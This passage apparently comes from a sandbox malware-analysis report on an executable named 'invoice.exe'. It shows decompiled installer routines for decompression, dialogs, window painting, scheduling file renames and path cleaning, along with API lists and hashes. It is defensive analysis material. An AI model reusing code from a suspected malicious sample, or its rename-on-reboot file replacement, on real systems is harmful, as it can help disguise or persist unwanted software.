										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406f24
0x00406f2c
0x00406f30
0x00406f32
0x00406f35
0x00406f37
0x00406f37
0x00406f39
0x00406f40
0x00406f42
0x00406f42
0x00406f48
0x00406f5d
0x00406f65
0x00406f67
0x00406f69
0x00406f6c
0x00406f6d
0x00406f6d
0x00406f73
0x00000000
0x00000000
0x00406f75
0x00406f78
0x00000000
0x00000000
0x00000000
0x00406f78
0x00406f7c
0x00406f7f
0x00406f81
0x00406f81
0x00406f84
0x00406f8a
0x00406f8b
0x00000000
0x00000000
0x00000000
0x00406f8b
0x00406f90
0x00406f93
0x00406f95
0x00406f95
0x00406f9b
0x00406f9d
0x00406fae
0x00406fa1
0x00406fa5
0x0040724a
0x00000000
0x0040724a
0x00406fab
0x00406fac
0x00406fac
0x00406fb4
0x00406fb7
0x00406fbb
0x00406fbd
0x00406fbf
0x00406fc2
0x00000000
0x00000000
0x00406fca
0x00406fd0
0x00406fd2
0x00406fd4
0x00406fd5
0x00406fea
0x00406fea
0x00406fed
0x00406fef
0x00406fef
0x00406ff1
0x00406ff6
0x00406ff8
0x00406fff
0x00407001
0x00407009
0x00407009
0x0040700b
0x0040700c
0x0040701b
0x0040701f
0x00407023
0x00407026
0x00407029
0x0040702e
0x00407031
0x00407037
0x0040703e
0x00407044
0x0040723d
0x0040723d
0x00407242
0x00407251
0x00000000
0x00000000
0x00000000
0x00407242
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705e
0x00000000
0x00000000
0x00407069
0x0040706c
0x0040706d
0x0040706f
0x00407075
0x00407078
0x00000000
0x00000000
0x0040707e
0x0040707f
0x00407082
0x00407085
0x00407088
0x0040708e
0x00407090
0x00407090
0x00407098
0x0040709c
0x004070a1
0x004070c6
0x004070cc
0x004070ce
0x004070d0
0x004070d3
0x004070dc
0x00000000
0x00000000
0x004070a3
0x004070a3
0x004070ac
0x004070b0
0x00000000
0x00000000
0x004070c1
0x004070c1
0x004070c4
0x00000000
0x00000000
0x004070b4
0x004070b7
0x004070b9
0x004070bd
0x00000000
0x00000000
0x004070bf
0x004070bf
0x00000000
0x004070c1
0x004070e5
0x004070eb
0x004070f5
0x004070f7
0x004070fc
0x004070fe
0x00407134
0x00407100
0x00407100
0x00407103
0x00407106
0x00407110
0x00407113
0x0040711a
0x00407125
0x0040712c
0x0040712c
0x00407136
0x00407139
0x0040713b
0x00407141
0x00407141
0x0040714a
0x0040714d
0x00407152
0x00407161
0x00407169
0x0040716e
0x00407192
0x0040719a
0x0040719e
0x004071a4
0x00407170
0x0040717e
0x00407181
0x00407187
0x00407187
0x004071a8
0x00407163
0x00407163
0x00407163
0x004071b9
0x004071bd
0x004071c9
0x004071c4
0x004071c7
0x004071c7
0x004071d1
0x004071d6
0x004071de
0x004071da
0x004071dc
0x004071dc
0x004071e4
0x004071e6
0x004071ed
0x004071f7
0x00407201
0x0040721d
0x00407221
0x00407066
0x0040706c
0x0040706d
0x0040706f
0x00407075
0x00407078
0x00000000
0x00000000
0x00000000
0x00407078
0x00000000
0x00000000
0x00000000
0x00000000
0x00407203
0x00407203
0x00407203
0x00407208
0x00407211
0x0040721a
0x00000000
0x0040721a
0x00407227
0x00407227
0x0040722a
0x00407231
0x00407234
0x00000000
0x00407057
0x00406fd7
0x00406fd9
0x00406fd9
0x00406fdd
0x00406fe0
0x00406fe1
0x00406fe1
0x00000000
0x00406fd9
0x00406f4d
0x00406f53
0x00000000

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040416F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040416F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42983c =  *0x42983c + 1;
								__eflags =  *0x42983c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040408D(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push("true");
									E00404413(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f408, 0x111, "true", 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42983c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x42a048; // 0x67d2e4
					_t25 = _t103 + 0x14; // 0x67d2f8
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00404048(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004043EF();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebdc; // 0x67efe9
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f458;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040413A;
					E00404026(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00404026(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
					E00404048( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E0040405B(_t99);
					SendMessageA(_t99, 0x45b, "true", 0);
					_t86 =  *( *0x42f414 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42983c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42983c = 0;
					return 0;
				}
			}

0x0040417f
0x00404291
0x004042a4
0x00404300
0x00404300
0x00404304
0x004043ca
0x004043d1
0x004043d3
0x004043d3
0x004043d3
0x004043d9
0x004043d9
0x004043dc
0x00000000
0x004043e3
0x00404312
0x00404314
0x00404317
0x0040431e
0x00404320
0x00404327
0x00404329
0x0040432c
0x0040432f
0x00404334
0x0040433a
0x0040433d
0x00404344
0x00404352
0x0040436a
0x0040436c
0x00404374
0x00404383
0x00404385
0x00404385
0x00404344
0x00404327
0x00404388
0x0040438f
0x00000000
0x00404391
0x00404391
0x00404398
0x00000000
0x00000000
0x0040439a
0x0040439e
0x004043af
0x004043af
0x004043b1
0x004043b5
0x004043c3
0x004043c3
0x00000000
0x004043c7
0x0040438f
0x004042ac
0x004042af
0x00000000
0x00000000
0x004042b7
0x004042bd
0x00000000
0x00000000
0x004042c3
0x004042c9
0x004042c9
0x004042cc
0x004042cf
0x00000000
0x00000000
0x004042f2
0x004042f2
0x004042f4
0x004042f6
0x004042fb
0x00000000
0x00404185
0x00404185
0x00404188
0x0040418d
0x0040418f
0x0040419e
0x0040419e
0x004041a5
0x004041a8
0x004041aa
0x004041af
0x004041b8
0x004041be
0x004041ca
0x004041cd
0x004041d6
0x004041db
0x004041de
0x004041e3
0x004041fa
0x00404201
0x00404214
0x00404217
0x0040422c
0x00404233
0x00404238
0x0040423d
0x0040423d
0x0040424c
0x0040425b
0x0040426d
0x00404272
0x00404282
0x00404284
0x00000000
0x0040428a

APIs

CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041FA
GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040422C
GetSysColor.USER32(?), ref: 0040423D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
lstrlenA.KERNEL32(?), ref: 0040425E
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
GetDlgItem.USER32(?,0000040A), ref: 004042E4
SendMessageA.USER32(00000000), ref: 004042E7
GetDlgItem.USER32(?,000003E8), ref: 00404312
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
LoadCursorA.USER32(00000000,00007F02), ref: 00404361
SetCursor.USER32(00000000), ref: 0040436A
LoadCursorA.USER32(00000000,00007F00), ref: 00404380
SetCursor.USER32(00000000), ref: 00404383
SendMessageA.USER32(00000111,?,00000000), ref: 004043AF
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3

Strings

N, xrefs: 00404300
Call, xrefs: 0040433D
:A@, xrefs: 0040436E
g, xrefs: 0040418F

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: :A@$Call$N$g
API String ID: 3103080414-1882028536
Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f414;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Yllerion Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Yllerion Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Yllerion Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Yllerion Setup
API String ID: 941294808-2001645527
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405BD4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BD4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c600 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);
						_t53 = _t52 + 0x10;
						E00405F87(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));
						_t12 = E00405AFE(0x42ca00, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405B76(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405A63(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405A63(_t38, _t21 + 0xa, 0x40a3b8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405AB9(_t24 + _t46, 0x42c200, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405BA5(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405AFE(_t44, 0, "true"));
					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405bd4
0x00405bdd
0x00405be4
0x00405bf8
0x00405c20
0x00405c2b
0x00405c2f
0x00405c4f
0x00405c56
0x00405c60
0x00405c6d
0x00405c72
0x00405c77
0x00405c7b
0x00405c8a
0x00405c8c
0x00405c99
0x00405c9d
0x00405d38
0x00000000
0x00405cb3
0x00405cc0
0x00405ce4
0x00405ce8
0x00405d07
0x00405d0b
0x00405d0b
0x00405d0d
0x00405d16
0x00405d21
0x00405d2c
0x00405d32
0x00000000
0x00405d32
0x00405cea
0x00405ced
0x00405cf8
0x00405cf4
0x00405cf6
0x00405cf7
0x00405cf7
0x00405cff
0x00405d01
0x00000000
0x00405d01
0x00405ccb
0x00405cd1
0x00000000
0x00405cd1
0x00405c9d
0x00405c7b
0x00405bfa
0x00405c05
0x00405c0e
0x00405c12
0x00000000
0x00000000
0x00405c12
0x00405d43

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E

Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5

GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
wsprintfA.USER32 ref: 00405C49
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
GlobalFree.KERNEL32(00000000), ref: 00405D32
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39

Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24

Strings

[Rename], xrefs: 00405CB3, 00405CC5
%s=%s, xrefs: 00405C3F

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 363ee5158e29d41a6ab622f5bcc6767fef57e6b00bf8f5aa156339dff7e04b73
Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
Opcode Fuzzy Hash: 363ee5158e29d41a6ab622f5bcc6767fef57e6b00bf8f5aa156339dff7e04b73
Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 004061CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061CF(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040596A(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405928("*?|<>/\":", _t5))) == 0) {
							E00405AB9(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004061d1
0x004061d9
0x004061ed
0x004061ed
0x004061f3
0x00406200
0x00406200
0x00406201
0x00406203
0x00406207
0x00406209
0x00406212
0x00406214
0x0040622e
0x00406236
0x00406236
0x0040623b
0x0040623d
